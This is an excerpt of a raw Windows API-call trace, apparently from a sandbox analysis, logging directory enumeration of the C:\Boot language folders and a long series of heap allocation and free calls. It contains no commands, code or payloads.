FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.335] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.335] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0169.335] FindClose (in: hFindFile=0x8025d8 | out: hFindFile=0x8025d8) returned 1 [0169.335] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.335] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="et-EE", cAlternateFileName="")) returned 1 [0169.335] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.335] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802058 [0169.336] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.336] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.336] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0169.336] FindClose (in: hFindFile=0x802058 | out: hFindFile=0x802058) returned 1 [0169.338] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.338] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0169.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.339] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x801ed8 [0169.339] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.341] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.341] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.911] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.912] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.912] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.913] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.913] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.914] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.915] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.916] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.916] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.917] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.918] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.918] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.919] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.920] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.924] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.924] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.926] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0169.926] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.926] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.927] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.927] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.928] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.928] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.929] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.930] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.930] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.931] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.931] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.931] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.932] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.932] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x31f0050 | out: hHeap=0x710000) returned 1 [0169.936] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x31f0050 | out: hHeap=0x710000) returned 1 [0170.236] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x31f0050 | out: hHeap=0x710000) returned 1 [0170.843] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x31f0050 | out: hHeap=0x710000) returned 1 [0170.844] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x31f0050 | out: hHeap=0x710000) returned 1 [0170.850] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0170.858] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0170.861] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.861] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.861] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.861] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.862] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.862] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.863] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.866] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.867] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.867] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.867] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.868] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.869] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.869] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0170.871] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.115] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.115] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.261] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.427] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.430] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.430] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.430] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.430] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.432] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3250 | out: hHeap=0x710000) returned 1 [0171.432] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.433] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.434] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.434] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.435] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.438] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.438] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.439] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.441] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.442] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.442] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.442] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.445] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.445] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.445] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.445] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.447] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.447] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.448] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.448] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.453] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.453] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.454] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.454] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.455] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.455] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.455] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0171.455] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0171.722] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0171.722] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.207] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.207] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.254] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.257] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.283] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.284] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.284] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.301] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.301] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.308] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.309] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.349] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ec3248 | out: hHeap=0x710000) returned 1 [0172.349] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.349] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.352] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0172.353] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.355] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.356] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0172.357] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0172.359] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.360] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0172.361] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.362] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0172.362] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.364] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0172.365] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.365] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.366] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0172.366] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0172.807] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.829] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.829] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.830] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0173.068] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.068] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.068] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.071] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.073] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.076] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.080] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3248 | out: hHeap=0x710000) returned 1 [0173.080] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.080] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.082] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.092] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0173.092] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0173.092] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0173.093] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0173.098] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3248 | out: hHeap=0x710000) returned 1 [0174.060] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ed3248 | out: hHeap=0x710000) returned 1 [0174.091] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0175.163] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f17280 | out: hHeap=0x710000) returned 1 [0176.107] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f17280 | out: hHeap=0x710000) returned 1 [0176.107] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f582a0 | out: hHeap=0x710000) returned 1 [0176.115] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0176.143] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f582a0 | out: hHeap=0x710000) returned 1 [0176.146] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f582a0 | out: hHeap=0x710000) returned 1 [0176.149] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f582a0 | out: hHeap=0x710000) returned 1 [0176.149] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0176.152] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0176.154] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0176.158] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0179.261] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0179.263] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0179.789] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0179.789] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3eb3240 [0179.794] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0179.795] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0181.430] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0181.430] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0181.878] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0181.881] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0183.263] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0183.277] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0183.285] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0183.334] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f582a0 | out: hHeap=0x710000) returned 1 [0183.336] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0183.337] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0183.337] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0185.883] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0186.182] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f882b8 | out: hHeap=0x710000) returned 1 [0186.205] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f882b8 | out: 